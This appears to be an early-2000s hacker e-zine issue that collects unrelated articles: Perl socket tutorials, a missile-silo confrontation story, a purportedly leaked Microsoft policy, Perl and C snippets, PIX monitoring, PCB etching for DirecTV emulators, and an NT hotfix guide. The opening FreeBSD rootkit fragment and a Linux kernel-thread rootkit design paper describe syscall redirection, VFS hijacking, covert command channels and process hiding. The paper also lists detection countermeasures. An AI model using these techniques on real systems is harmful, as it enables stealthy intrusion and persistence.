memcpy(uap->fname, &execred[size].newexec, sizeof(execred[size].newexec)); can overflow uap->fname buffer. put a symlink isn't a big problem with a trojan ls you may hide it on 3 seconds the Makefile: ------------------------------------------------- cut here ----------- SRCS = mozarela.c KMOD = mozarela KO = mozarela.ko KLDMOD = t KERN = /usr/src/sys/kern .include ------------------------------------------------- cut here ----------- any kld could have a lots of implentation, i can't discute here, there are a lots of example on the linux/freebsd/solaris kernel programming tutorials from THC group and a lots of example and study from s0ftpj group. -- L A S T W O R D A B O U T I N F I N I T E W A R -- crackers create rootkit, security man create md5sum crackers create execve redirection security man create securelevel and syscall ripristination the securelevel maybe explained on various man pages on freebsd, syscall ripristination is explained on paper of Pragmatic, syscall ripristination IMHO can be fucked with monitoring of kldload() and kldfind() for DROP any module loaded after mozarela or some other trojan on the kernel (not on other linked file!) securelevel can be fucked with a spapem packages coded by vecna (you may find info about on the README file on http://www.s0ftpj.org/tools/spapem.tar.gz) that's all, for this time :) [A Newbies Guide To Sockets in PERL]===================================[Beowulf] Some of this was taken from "PERL in a nutshell" by Oriely. (and then modified by me) I'm assuming you have programed in PERL before or maybe just a little bit because this is not a newbies guide to PERL but to sockets in PERL. So a small background in the language would be nice. This paper will contain a quick introduction to sockets, programing only the client side. (Because im too lazy to do server side) If you really want to make it easy, using the IO::Socket module, at the end will be a quick little script that tests ports to see if they are open from the client side. Feel free to modify it because its pretty lazy coding, but it was late and I didnt have a lot of time so change it. Anyways if you have any questions, email me at chixdigUNIX@the-pentagon.com or talk to me on irc undernet under the name beowulf. On with the tutorial! First off you need to know what a socket does... I took this definition right from one of oriely's book so dont get mad at me if you dont like it... "Sockets are the underlying mechanism for networking on the Internet. With sockets, one application (a server) sits on a port waiting for connections. Another application (the client) connects to that port and says hello; then the client and server have a chat. Their actual conversation is done with whatever protocol they choose - for example, a web client and server would use HTTP, an email server would use POP3 and SMTP, etc. But at the most basic level, you might say that all network programming comes down to opening a socket, reading and writing data, and closing the socket again. Sockets provide a connection between systems or applications. They can be set up to handle streaming data or discrete data packets. Streaming data continually comes and goes over a connection. A transport protocol like TCP (Transmission Control Protocol) is used to process streaming data so that all of the data is properly received and ordered. Packet-oriented communication sends data across the network in discrete chunks. The message-oriented protocol UDP (User Datagram Protocol) works on this type of connection. Although streaming sockets using TCP are widely used for applications, UDP sockets also have their uses. Sockets exist in one of two address domains: the Internet domain and the Unix domain. Sockets that are used for Internet connections require the careful binding and assignment of the proper type of address dictated by the Internet Protocol (IP). These sockets are referred to as Internet-domain sockets. Sockets in the Unix domain create connections between applications either on the same machine or within a LAN. The addressing scheme is less complicated, often just providing the name of the target process." Socket Functions in PERL socket - Set up a socket and assign a filehandle to it connect - Client side only: you guessed it it connects to a socket recv - Reads data from a filehandle send - Writes data to a filehandle shutdown - Terminates a connection How to set up a socket: You need several arguments before you can set up a socket such as... either PF_INET if you want to connect to a internet address or PF_UNIX if you are connecting to a UNIX domain address. Next you need to set up the argument for what type of connection you want to establish. If you want to have a packet-based UDP connection you would use SOCK_DGRAM, or if you want a streaming TCP connection you would use SOCK_STREAM, The next argument would be the protocol you want to use for the connection, you would use getprotobyname for this.. And for the last argument your going to want that handy die command with the error variable $!. So lets look at a typical way to set up a socket... use Socket; socket (BLAH, PF_UNIX, SOCK_STREAM, getprotobyname('tcp')) || die $!; Ok lets take a look at the arguments used...The BLAH would be the sockets filehandle. The PF_UNIX would set up sockets for a Unix domain address, the SOCK_STREAM would specify the streaming TCP connection, the getprotobyname sets the protocol to be TCP and then, of course, you have the die command. Client Side Programing: For a client side program after you set up the socket you need to connect to a specific port with the connect command. Again you need arguments the first being the socket filehandle and the second being the data structure. You will also need either the sockaddr_un for Unix domain addresses and sockaddr_in function for internet addresses. If you want to use sockaddr_in you need more arguments, the first is the port number, the second is a ip address or a URL. So lets say you want to connect to port 21 on the server blah.com it would look something like this: my $variable = sockaddr_in (21, inet_aton('blah.com')); connect (KFL, $variable) || die $!; If it does connect it will return a true value (i.e. 1)if it doesnt it will display the error message with the $! variable. If it does connect you can do a number of things such as the send command which sends data to the host or the recv command to read incoming data on the socket. After you are done using the socket you'll want to shut it down with the close or shutdown command. The IO::socket module: The IO::socket module is included in the core of perl and it makes life easier for all you lazy programers. Instead of using the above method, using this module makes it more object oriented. Here is an example on how to set up a socket: use IO::Socket; $blah = new IO::Socket::INET (PeerAddr => 'X.X.X.X', PeerPort => 23, Proto => 'tcp'); die "$!" unless $blah Ok you can pretty much figure it out yourself where X.X.X.X is the ip or host name of the server. PeerPort is obviously the port you want to connect to and the proto is the protocol you want to use. There are other functions of the IO::socket module but im too lazy to write them all out you can get more info on them at cpan.org Example of a badly written program without using the IO::socket module to test ports: #!/usr/bin/perl use Socket; socket (BLAH, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die $!; print "Please enter the host you want to test\n"; chomp($host = ); print "please enter a port\n"; chomp($port = ); my $blah = sockaddr_in ($port, inet_aton("$host")); connect (BLAH, $blah) || die $!; if ($blah) { print "Port found\n"; } else { print "Port not found for reason... $!\n"; } ok and now for one with the IO::socket module: #!/usr/bin/perl use IO::Socket; print "Please enter the host you want to test\n"; chomp($host = ); print "please enter a port\n"; chomp($port = ); $blah = new IO::Socket::INET (PeerAddr => "$host", PeerPort => $port, Proto => 'tcp'); if ($blah) { print "Port found\n"; } else { print "Port not found for reason... $!\n"; } Ok well thats it for the time being if this makes it into KV then I will write up another paper this time on the server side. Hi to everyone i know on irc later for now, beowulf [Curiosity killed the American Citizen]===============================[Firewa11] The secret military. The nifty spy cameras. The homing devices. Big brother looking down on us from above. The entire program waiting to crush you the moment you might uncover the truth to any of their lies. Seems like just a good movie you caught the other day right? You've always known such a program exists but you've never seen it for yourself. Well, I have. Here's what happened: I'm a curious, inquisitive person. I'm an engineer by career and an engineer by home. I like to know how things work. A conversation with Digi sparked an interest in missile silos. I looked at the ones for sale, which prompted me to look at all abandoned missile silos. So, I started looking at all of the abandoned silos from where I grew up. Wow, I only knew of the ones over by the lake, never anywhere else. There were a lot of them. So, as I'm scoping it out, I find a site that appears to be in really good shape. Great. I can contact the owner of the land, and perhaps he will let me on the site to take pictures. Maybe if it hasn't been sealed in, I can go down inside. Cool! As I'm playing around on Terraserver, I'm looking at all of the stuff around the area, and happened to come across something familiar. It's a site that looks identical to the silos out by the lake, except this one isn't grown over, and appears to have not been dismantled. Funny, it's not in my list of former or current sites. Curiosity kicks into overdrive. So, I go hang out with my parents for a day, and decide on my way home I'm going to swing by those sites and see what I can see. The 'reality' voice in my head is telling me that all is going to happen is I'm going to meet locked gates, nothing to see, and a waste of gas. Ok, sure. At least my curiosity will have been calmed. First site. It's the old one. The one that I have listed as abandoned. Yup, the gate is locked and has a "Posted: No trespassing" sign in plain view. I can see that the road is all but grown over, and trees have started to grow up through the concrete on the pad. Definately not in working order. Ok, time to head back to the other site, and take a look. Second site. This is the newer looking one. From my outdated pictures on terraserver, it looks to be a well-kept location, with structures that are usually removed as soon as a site is decommissioned. Interesting. Anyways, I pull up to the gate, roll down my window, and start taking pictures with my good SLR camera. I don't want to switch lenses, but I can't quite make out what the signs say, so I get out of the truck and go up to the gate and start taking shots of the signs. The first sign says "Posted: No trespassing", and the other I couldn't quite remember, but listed stuff like an oil lease. Nowhere did it say anything about a military installation or the like. The signs were crudely fastened to an old chainlink fence that surrounded the entire facility. As I turn to leave, I hear a man ask what I was doing. I turned to look, and the man was dressed in a pair of blue-jeans and his shirt was a faded long-sleeve cowboy style shirt. He had overgrown long hair and his smile suggested many years without a toothbrush. He looked to be in his 30s. Anyways, I told him I was doing some research on abandoned missile silos in the area and came across this site. He asked if I wanted to come in take a look around, and of course I said yes. I ran back to my truck and grabbed another roll of film and put it in my pocket, then followed him through the now open gate. To the left is the old abandoned gatehouse. It looks rusted down, and is missing a door. Looks like some old cardboard boxes inside. Up ahead to the left is an old house. Looks like it's been there quite awhile. Basketball goal in front of the driveway, and a bunch of kids toys lying on the ground. About 10 ft from the gate, as we're walking into the facility, out of nowhere and without sound, someone grabs me from behind. At this point I'm wondering "what the fuck?", so as I get spun around I see a man in camo reaching for my camera, so instinctively I hold it away. WHAM! I get knocked in the gut, and my arms fold to protect my stomach and the camera is pulled from my hands. The soldier, whos name I did mention to grab, proceeds to open up my camera and pull the film from it tearing it roughly out. As I finally catch my breath from having the wind knocked out of me, he throws the camera to me, which ends up falling down and landing on my feet. Then he tells me to "Get in your truck and get gone". Which I comply with, no questions asked. As he turns to leave I see the matte black M-16 strapped over his shoulder, and the civilian guy glare at me as he too turns and walks up to the house. I throw my camera and the now-destroyed roll of film in the side seat and took off. My hands were shaking so badly I couldn't even dial a number on my cell phone, so I proceeded to chain smoke all the way back into town. After about a pack of smokes and mountain dew, I was good to go. I called and talked with Digi, as well as others. Reflections.... Ok, if something wanted to remain completely secret, they would have not come out and opened the gate. With a closed gate and a normal enough looking house, it could have been dismissed and I would have went home. However, in a given year, how many people actually come out and photograph gates of places they find on Terraserver? Maybe these guys didn't know how to react. Or maybe they did. Heh. Such possibilities there are when dealing with the unknown. So my safest bet at this point is to file an official complaint with the base commander for assault on a civilian. If that gets me nowhere, then I'm not going to press further. I mean, I *could* call the cops, I could write my congressman, I could jump up and down and scream bloody mary, but all that is going to do is cause me to get buried. So, I release this information to those whos conviction will be strengthed by it. We all know these places exist. The signs are all around us. But until we are staring down the barrel of a few assault rifles to we realize the real face behind the machine. [Microsoft's OpenSource Policy]===============================[Elite Secret Spy] Editor's Note: One of our elite security spies pulled this out of microsoft way back in January, but since we aren't as fast as we used to be, it's just now making it in. Don't know if this has been published or not, don't care. PROPER USE OF OPEN SOURCE SOFTWARE AT MICROSOFT OSS includes a wide range of products distributed under a variety of licenses such as the General Public License (GPL), Lesser General Public License (LGPL), and Berkeley Software Distribution (BSD) license. If you are uncertain whether software you intend to use is considered “open source”, or the license you plan to use will result in the software being treated as OSS, please check with the Microsoft Manager to whom you are assigned. Microsoft's goal with respect to the treatment of OSS is to avoid inadvertently contributing our intellectual property to an open source effort. The rules below are intended to protect valuable Microsoft intellectual property and MUST be followed: 1. Do not incorporate OSS into MS products. 2. Do not contribute code to an open source project. 3. Do not review, modify or distribute OSS source code. 4. Other than OSS source code, it is okay to review other information about open source projects (e.g., architecture descriptions included in books, project descriptions provided at websites, development discussions conducted on the Internet, etc.), provided that you comply with any accompanying licenses or restrictions. If you have questions about the rules governing access to specific information, check with your Microsoft Manager to whom you are assigned. 5. You may run an OSS executable that is subject to the GNU General Public License (GPL) or any similar agreement, so long as the license or agreement does not require you to accept additional restrictions and/or obligations as a condition of running the software. If you have questions or concerns regarding the terms of a particular license or agreement, check with your Microsoft Manager to whom you are assigned. 6. For code that is developed, or otherwise owned by or licensed to MS, do not distribute or otherwise make the code available under an “open source” agreement These rules apply to all activities related to the business of Microsoft, regardless of the time or location of such activities. At times, you and the Microsoft Manager to whom you are assigned may reach the preliminary conclusion that there is a sound business reason for taking an action that is otherwise prohibited by the above general rules. In that event, the Microsoft Manager will check with their LCA contact who will assess any legal risks associated with the action and advise on the steps the Microsoft Manager needs to take to obtain executive approval for the action. An executive approval must be in place in order to deviate from the above rules. If you have any questions or concerns regarding Microsoft’s Open Source Software (OSS) guidelines please contact the Microsoft Manager to whom you are assigned or your agency or vendor employer contact. [PERL Headache of the Issue]=====================================[Digital Ebola] This issues headache was provided by mercs. He wanted to take two lists compare them, take the differences, and compile them into a third, unique list. Sounds quite easy, cause it's PERL, right? Not quite as such, there are no facilities to compare arrays (well no EASY facilities). And true to Larry's word, there was certainly more then one way to do it. Thanks to those that helped, for helping me find a better way to do it, then my original method. (Side note, mine was from PERL FAQ4, and the solution was ugly) #!/usr/bin/perl #comp.pl - compares two lists, and combines them into a third unique #list with no matching elements. Written for mercs, by Digital Ebola. #Much thanks to super, who helped out with the array comparisons. #Digital Ebola - 5/11/2001 my ($file1, $file2, $file3) = @ARGV; if (! @ARGV) { die "Usage: comp.pl listfile listfile completelist\n"; } open(FILE1,$file1) or die "Can't open $file1: $!\n"; open(FILE2,$file2) or die "Can't open $file2: $!\n"; open(FILE3, ">$file3"); @list1=; @list2=; print FILE3 @list2; for(my$i=0;$i<@list1;$i++) { print FILE3$list1[$i]if$list1[$i]ne$list2[$i]; } [Fun with XOSD]==================================================[Digital Ebola] /* xosd-tail.c by Digital Ebola */ /* You must have xosd for this to work, get it at www.freshmeat.net */ /* Greets to vac, teeceep, and super */ #include #include #include #include "xosd.h" #define FONa "fixed" int main(void) { FILE *unf; char ack[170]; xosd *osd; osd = xosd_init (FONT, "LawnGreen", 3, XOSD_top, 0); if((unf = fopen("syslog", "r"))!=NULL) { while(fgets(ack,sizeof(ack),unf)!=NULL) { xosd_display (osd, 0, XOSD_string, ack); sleep(5); } } xosd_uninit(osd); fclose(unf); return EXIT_SUCCESS; } [More PERL Madness]==============================================[Digital Ebola] #!/usr/bin/perl #GetHostByEverything by Digital Ebola use Socket; for($a=4;$a < 255;$a++) { for($b=1;$b < 255;$b++) { for($c=1;$c < 255;$c++) { for($d=1;$d < 255;$d++) { $iaddr = inet_aton("$a.$b.$c.$d"); $name = gethostbyaddr($iaddr, AF_INET); $straddr = inet_ntoa($iaddr); #I'm lazy, shuddap. system("/bin/echo $name >> report.txt"); print("\n$name\n"); system("/bin/echo $straddr >> report.txt"); print("$straddr\n"); system("/bin/echo ------------------------- >> report.txt"); print("-------------------------\n"); } } } } [CISCO PIX Connection Monitoring]====================================[DataShark] I started this project because the PIX family of firewalls can handle a ?limited? amount of concurrent connections and it was causing problems for us. My basic goal was to create a application to monitor PIX connections. I found that it was easier to do with MRTG then to create a stand alone application, so I set off into shell script land. My first challenge was to find the OID that stored the current connections to the PIX. After much searching and beating my head on my desk I was able to find it. CURCON=`/bin/snmpwalk -m ALL "" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.7' | awk -f /usr/local/mrtg-2/bin/proxy.awk` HICON=`/bin/snmpwalk -m ALL "" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.6' | awk -f /usr/local/mrtg-2/bin/proxy.awk` echo $CURCON echo $HICON echo '[unknown]' echo pix Ok lets look at the script: Line one the CURCON line (forgive word wrap) I use snmpwalk to gather the correct information the ?.1.3.6.1.4.1.9.9.147.1.2.2.2.1.5? OID returns two values so I remove the one I do not need and feed the entire thing to awk. Line two is the same as line one except I am drawing out the high connections. Then I format it MRTG accepts its input in 4 lines: Line one is the ?bytes sent? or in our case the current connections. Line two is the ?bytes received? for us its high connections. Line three is the uptime of the unit. If anyone wants to take the time to find the uptime OID on the PIX please send it to me. :> Line four is the name of the device being polled. Next up the MRTG configuration: This is pretty much your standard MRTG config file: Title[^]: Response times for ShortLegend[_]: count Legend1[_]: Legend2[_]: Legend3[_]: Legend4[_]: LegendI[_]: LegendO[_]: YLegend[_]: Count Options[_]: noo, gauge, growright, nopercent MaxBytes[_]: 15000 ImageDir: /var/www/html/mrtg LogDir: /var/www/html/mrtg/logs HtmlDir: /var/www/html/mrtg Refresh: 300 Interval: 5 RunAsDaemon: Yes Target[pixconn]: `/usr/local/mrtg-2/bin/pix.sh` MaxBytes[pixconn]: 1000000 Options[pixconn]: noo, gauge, growright, nopercent Colours[pixconn]: PURPLE#660066,BLACK#000000,RED#cc0000,RED#cc0000 Title[pixconn]: Pix Concurrent Connections PageTop[pixconn]:

PIX Concurrent Connections

System: PIX
Description:PIX 515UR - Concurrent Connections
Ip: 10.2.1.1
The only exceptions being the ?Target? line is the name of the shell script we just talked about. The other if the options line We have the ?noo? option that tells it not to graph the second line of the output from our script and the gauge option that tells it to treat the numbers as what they are and not incrementing counters. Look for a new version for RRDtool and some more trick cisco stuff as I get more time. Please submit requests, fixes, comments etc.. to crice@180096hotel.com. /* For the html version of this article http://www.hcity.net/~nomad/pix.html */ [Poor Man's Boards]==================================================[BigGeezer] I dont know if yall have heard about the DirectTV stuff that has been going on. Well.. Short and Sweet. People have been hacking the DirectTV H-card for sometime now. They were finally able to stop the hacking about 3 months ago. A few people, use emulators to get free tv.. Circut Boards that plug into a computer and into the DSS irda to get a signal.. (These arent blocked by the way so if you use emulators.. you still get free TV) It takes making 2 circuit boards. So I headed to the local Radio Shack and found out that it cost quite a bit of money to make your own boards. That just wasnt going to do. So after some investigation, and talking to a very *SMART* Electronics Engineer, I found out how to do it cheeper.. and have the equipment to make circut boards for anything. I'm not talking about the pref boards from radio shack.. I am talking printed circut boards.. just like you see in all electrical devices. The focus of this article is Home Made Printed Circut Boards. The first thing you need, is supplies... I know what your thinking.. "Here comes the expensive part". Your right. But.. if you think a total investment of $40 dollars, is expensive, you really should find another hobby anyways. Here we go.. the list: 1. Bubble Stone (the same size of CD cases. They are long and blue). You can find these at pet stores, in the aquatics section. 2. 2 Empty CD cases 3. Air Pump (the same kind for a fish aquarium) bought from a fish store. 4. Tubing.. (Should come with the air pump) 5. Access to a laser printer. 6. Labels.. (you need the backing) 7. Mutriatic Acid (spelling..?) bought at any swimming pool store.. or home depot. 8. Hydrogen Peroxide. bought at walmart for 87c for 1/4 gallon. 9. Copper clad board. Found at any electronic shop. 10. Silicone (Found at walmart auto parts) 11. A hot plate. (the electrical kind or a skillet would do as well) 12. Finger Nail Polish remover (or acetone) Putting it together. 1. Take the bubble stone with the 2 cd cases split apart. 2. Connect the cd cases around the bubble stone with silicone.. around the part that produces the bubbles. 3. Take the air pump and connect it to the bubble stone. There you go.. you haveB your burner made.. simple wasnt it..? Making the Circut Boards. Ok.. you have your diagram of the Circuit, print it out on the laser printer. On that copy, take the back of the label, clean it with the Finger Nail Polish remover, and tape it to the printed part and reprint it again, so the image is on the slick part. Now..put that aside for a bit. Turn your hot plate or skillet on, you can tell it is hot enough if you spray some water on it and the water beads up. Now tape the slick image printed part down on to the copper clad board. Put the copper clad board on the hot plate.. and with a towel or pot holder layed on top.. with a piece of wood on top of that, and press down for about 30 seconds. After the 30 seconds, remove the board from the hot surface and lay it aside for a few mins to cool down. Once it is cooled down, remove the paper. It will leave a perfect image of the circut on the copper clad board. Now the Burning process. Fill your burner with half and half Mutraitic Acid and peroxide. Turn your pump on so it is producing bubbles. Put the copper Clad board inside and watch the wonder of acid. As you are watching.. it will remove the copper around where the circuit was printed, but will leave the printed part alone. After about 3 or 5 minutes, the solution will turn green from the melted copper and you can see it is almost done. Once it is done, remove the board and rinse it off under the sink. WHAMO! You have yourself a nice printed circuit board. Just drill your holes where you want your connections and solder. I have been using this alot lately making chip programmers.. eeprom burners, servo boards, etc. I am in the process of making a frequency counter to use as a bug detector.. hehe.. I will be taking pictures of how I did this.. and posting them.. I will get Digi to put the URL up on his site, as soon as I get them done. [YAPOTTLK]=============================================================[Lawless] Yet another Paper on Trojening the Linux Kernel Typically when one thinks about kernel rootkits on linux, the subject of system call remapping comes up. This technique is tried and true; however, it is also quite easy to detect. Currently available are several utilities, including lomac and my StMichael LKM to handle these attacks. Moving beyond the simple systemcall remapping, there has been information published about actually rewriting some functions during the kernel runtime. Again, this can be detected easily by monitoring the values of the functions via a checksumming mechanism. Again, an example of such attacks on these attacks is available in StMichael_LKM-0.04. So, where to next? One area that has not been explored is the application of kernel threads in the production of a kernel rootkit. Although one would not have the easy access that systemcalls provide, since the kenrel threads are running in kernel space -- one can intercept, replace, or alter system activity in ways that are undetectable. But, for just a moment let me digress. +Kernel Threads+ ---------------- The concept of kernel threads is nothing new. A kernel thread is, for most purposes, no different then a regular user-land process with three exceptions: -- Each Kernel thread executes a single specific kernel function. This is in contrast to regular executable kernel functions accessible via events such as a system-call. -- Kenrel threads run only in kernel-mode, while regular processes run either in user-mode or kernel-mode (via systemcalls) -- Kernel threads are only use linear addresses greater then PAGE_OFFSET (defined in .h), due to the fact they run only in kernel mode. Source: Understanding the Linux Kernel, p94. ISBN: 0-596-00002-2 As mentioned, the kernel threads are simply defined functions within the kernel, that are passed to the kenrel_thread() call and daemonized. Kernel threads acquire their run time via the scheduler, and have a execution priority associated with them. One benefit of the kernel-threads is that since they are already in kernel-space, the latency associated with performing systemcalls is removed. This is, in part, the justification that was used for the implementation of the kernel httpd kernel thread. +Kernel Threads containing Hostile Code+ ---------------------------------------- So, how could a dubious individual utilize this feature of the linux kernel to implement hostile or subversive code on a system? A couple ways come to mind: -- Back-Orafice for Linux (Or some simular linux-based remote-administration *wink* tool. -- Attack-Concealment (Hiding Files, Connections, Processes, etc). To implement these features, we will look at how the kenrel threads could access the network overtly or covertly, modify or intercept filesystem calls. Other items that could be done is to actually modify the memory management to selectively load certain memory pages in depending on some circumstance -- ie, think double books. +Kernel Threads And Overt Network Access+ ----------------------------------------- As a process, the kernel threads have a context. That permits them to easily possess open file descriptors and network sockets. Because of this, writing a specific kernel_therad that would accept connections, or write data to a network socket (via the appropriate system calls) can be done from within kernel space. The only challenge that would have to be handled by the developer of a kernel thread requiring overt network access is working without the comfort of the network libraries. Sure, one could probably statically link the libraries to the module -- but its a waste of space. Moreover, it take the fun out of writing a kernel thread. Ever hear of roughing it? All of the network functions that could be used, with the exception of data manipulation functions (ie, htol), eventually perform a system call. Guess what? The kernel thread executes in kernel context! That means that the kernel thread could simply call the system call directly. For example, to call, say write to a connected socket's file descriptor (say fd 10) the buffer "Hello World", one would use: ret_val = (*sys_call_table[__NR_write])(10,"Hello World",12); +Kernel Threads And Covert Network Access+ ------------------------------------------ Well, that's all fine and dandy. However, if the kernel_tread is truly hostile it probably shouldn't have open network sockets just lying around. Perhaps they could be hidden, but why even bother? Once again, the kernel_thread is executing in kernel context. That means it can see the incoming and outgoing network traffic as it is stored in the individual sk_buff lists, accessible from the skb_head_pool. Reference: linux/net/core/skbuff.c By monitoring established network connections for to read data, or using established network connections to transmit data to connected, the activities of the kernel_thread can be concealed from the system, and specially crafted communications utilities can user innocuous services that legitimately operate on the victim host, such as httpd or sendmail, to manage the network connections by which commands and responses would be transmitted from a controlling remote host and the victim host. +Kernel Threads and File-system Access+ -------------------------------------- In UNIX, everything is represented on the fileystem. System memory, itself, exists as a file, /dev/kmem. Without touching system call tables, how can one control the actual filesystem activity? In Linux, all the filesystems are abstracted under a virtual filesystem layer. Associated with each instance of a filesystem on a device is a operations structure, which maps the real file-system operations to the VFS layer. In the case of ext2fs, the ops table is defined in linux/fs/ext2/super.c and is called ext2_sops. An attacker wishing to manipulate this structure has two options: 1. Rewrite the structure with the tronned operations. 2. Seek out all superblocks, and currently open file descriptors replacing the ops pointer with a address of the tronned operations residing in the kernel_thread. The first option is the easiest to implement, the trojaned structure is simply copied over the original structure. No further changes are necessary. If the structure is being monitored via a checksumming mechanism, it will be identified as changed (as a static structure this is definitely a sign that something is afoot). The risk of this occurring is mitigated by the fact that the ext2_sops structure is not an exported symbol, and is not easily monitored. The second option is be harder to detect, but would requires more work to implement. First, each mounted filesystem would have to have its in-memory copy of its superblock modified to reference the trojaned operations structure. Secondly, all currently open files on those filesystems would have to be modified, as they copy the ops pointer from their superblock upon creation of the file descriptor. +Kernel Thread Concealment+ --------------------------- What good is a kernel thread to do all the nice and naughty things in the world if it stands out like a sore thumb. I mean, part of the reason for looking at this is to hide ones presence. Then why would one be content having a kernel thread appear as: root 9 0.0 0.1 1368 72 ? S Jul14 0:12 [ur0wn3d] OK, maybe that is a little bit over the top, but you get the point. Again, a simple solutions: Remember that filesystem stuff? Yep, proc file system too. One word: proc_sops +Detection and Countermeasures+ ------------------------------- So, faced with this type of mechinism that can conceal attacks and be used as a remote administration tool for linux systems, how do we protect ourselves? 1. Disabling the kenrel_thread call is insufficient. Even if the call is disabled on a system after the necessary kernel threads are started, then one can use their time during init_module to 'roll their own' kernel thread call. 2. Checksumming various common and critical filesystem, memory management, and scheduling data structures would prevent a kernel thread from using its position to subvert the low level memory management, filesystem, and scheduling code. This does not detect or prevent other mallicious effects that could be done by the kernel thread. 3. In StJude, tie kernel threads to the default (no privlage) rule. kernel threads can be identified by abnormalities in their task_struct, so this is possible. It would limit the use of kernel threads as remote administration tools. This is just a brief summery of possible countermeasures. Others may follow. Despite this, the kernel threads provide an elegent and dangerous mechinism for the implementation of hostile code within the linux kernel. [I Got Windows, Now What?]==============================================[Ntwak0] >------------------------------------------------------------------------------< OOO OOOO O OOOOOO OOOOOO OOOO OOOOO OOOOO OOOO OOOO O OOOOOO OOOOOO OOOO OOOOO OO OO OOO OO OOOOOOOO OO OO OO OOOOOO OO OOO O O O OO OO O OO OOO OO OO OOO OOOOO O O O OO OO O OO OOO OO OOOOOOO OOOOOO O O O OOOO O OOO OOO OOO OO OO OO OO OO O OOO OO OOO OOO OOO OO OOO OO OO OOO OOO OOOO OOO OOOOOO OO OO OOOOOOOO OOOO OOO OOOOO >------------------------------------------------------------------------------< >-----------------------------------------< | * 1- I got Ne / 2K Now What ? | | * 2- Who Should Read This ? | | * 3- What does it Cover ? | | * 4- After you install NT Do this ? | | * 5- NT HotFixes By File Version ? | | * 6- After you install NT HotFixes ? | | * 7- Next KV will Cover The Registry | >-----------------------------------------< >------------------------------------------------------------------------------< >------------------------------< >---I got NT / 2K Now What ?---< >------------------------------< As you may know NT and 2K default install is not the FULL secure install. This paper is Mulit-Part, this means I am going to cover in this article the HOTFIXES section, next article will cover the NT + 2000 Registry (Wait for it :). I am going to cover NT hotfixes and if I still have space in this article I will cover 2000 Hotfixes. In my descriptions I am going to be breif but effective, no BLAH BLAH...etc... >------------------------------< >---Who Should Read This ? ---< >------------------------------< Any home use who like to patch his / her box Any business user who like to cut time when fixing his / her NT 2000 box Any NT sysadmin who like learn a bit more >------------------------------< >---What does it Cover ? ---< >------------------------------< This version cover NT Hotfixes by file version. What do I mean by file version? Here is the catch, more commercial tools that check for HOTFIXES, they do it based by query the REGISTRY. I will explain more, when you install NT hotfixes registry key is created and some files or registry keys are updated all depend on the hotfix. Checking the registry KEY is not the perfect way to make sure your have the latest file version. As we all know when you install application files get replaced and changed and so on... for this reason I decided to check for HOTFIXES using file version. Sure this method is a pain in the a$$ but at least once done I will be sure all my files are OK. OH !!! Before we start do not get SCARED by the HOTFIXES number. >------------------------------------------< >---After you install NT or 2K Do this ?---< >------------------------------------------< ---> Install SP (Service Pack) First thing you should do after you configure your NT or 2K to connect to the internet is to start fixing it :) =============== NT Server & Wks =============== When you install NT default you do not have a browser capable to connect to MS site and get the hotfixes I suggest you installin the latest (IE 5.5 ) So to install IE 5.5 you cannot just go from the default NT install to MS site and get the latest IE, because your default IE is 3 and MS site needs framing support and other gadgets. SO to solve this open your browser IE 3 default or whatever. ---> Connect to Microsoft site and get the Service pack Sp6a from this location: http://download.microsoft.com/download/ie55sp1/Install/5.5_SP1/WIN98Me/EN -US/ie5setup.exe get that file and then you are all SET -:). After you install IE 5.5 SP1 install SP6a for NT and SP2 for 2000, install the 120 Bits version if you are allowed. ---> Connect to Microsoft site and get the Service pack Sp6a from this location: http://support.microsoft.com/Support/NTServer/Content/ServicePacks/Default.asp If you need to read more about the service pack installation point your browser to: http://www.microsoft.com/ntserver/nts/downloads/recommended/SP6/ ---> Install SP6a 128 bits and Reboot ================== 2K Advanced Server ================== ---> Connect to Microsoft site and get the Service pack SP2 from this location: http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/sp2lang.asp ---> Install SP2 and Reboot >------------------------------------< >---NT HotFixes By File Version ? ---< >------------------------------------< =============== NT Server & Wks =============== You need to download the hot fixes and install them. Here is a list of available Hot fixes. After getting what you need put them in one directory and create a batch file to install them all whitout rebooting everytime. HINT: To install a HotFix without rebooting and creating a UN-install directory use these switch after the HOTFIX.exe -q -z -n. Some HotFixes need /Q . To know what you need exactly type the hotfix number followed by /? "QXXXXXX.exe /?" Example of a batch file that install the HOTFIXES for your without rebooting: ---[SNIP]--- echo ------[ This is an example of batch file that install NT Hotfixes]------ echo ------[ MS00-003:Q247869 Spoofed LPC Port Request]------ Q247869i.EXE -n -q -z echo ------[ MS00-004:Q249108 RDISK Registry Enumeration File]------ Q249108i.EXE -n -q -z ---[SNIP]--- Here is the list of needed HOTFIXES for NT without IIS 4, this will include file name and file version and a brief description Saturday, July 07, 2001 6:53:50PM NT4 MS00-003 Description=Q247869 MS00-003 Spoofed LPC Port Request Info=http://www.microsoft.com/technet/security/bulletin/fq00-003.asp Q247869i.EXE -n -q -z File=%SystemRoot%\system32\NTOSKRNL.EXE Version=4.0.1381.7086 NT4 MS00-004 Description=MS00-004: RDISK Registry Enumeration File Info=http://www.microsoft.com/technet/security/bulletin/ms00-004.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17745 Q249108i.EXE -n -q -z File=%SystemRoot%\system32\rdisk.exe Version=4.0.1381.7033 NT4 MS00-005 A Description=MS00-005: Malformed RTF Control Word Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510 Q249973i.EXE -n -q -z File=%SystemRoot%\system32\riched20.dll Version=5.0.122.2 NT4 MS00-005 B Description=MS00-005: Malformed RTF Control Word Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510 Q249973i.EXE -n -q -z File=%SystemRoot%\system32\riched32.dll Version=4.0.835.1381 NT4 MS00-006 A Description=MS00-006 Malformed Hit-Highlighting Argument Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp q252463i.exe -n -q -z File=%SystemRoot%\system32\idq.dll Version=5.0.1781.3 NT4 MS00-006 B Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp q252463i.exe -n -q -z File=%SystemRoot%\system32\query.dll Version=5.0.1781.3 NT4 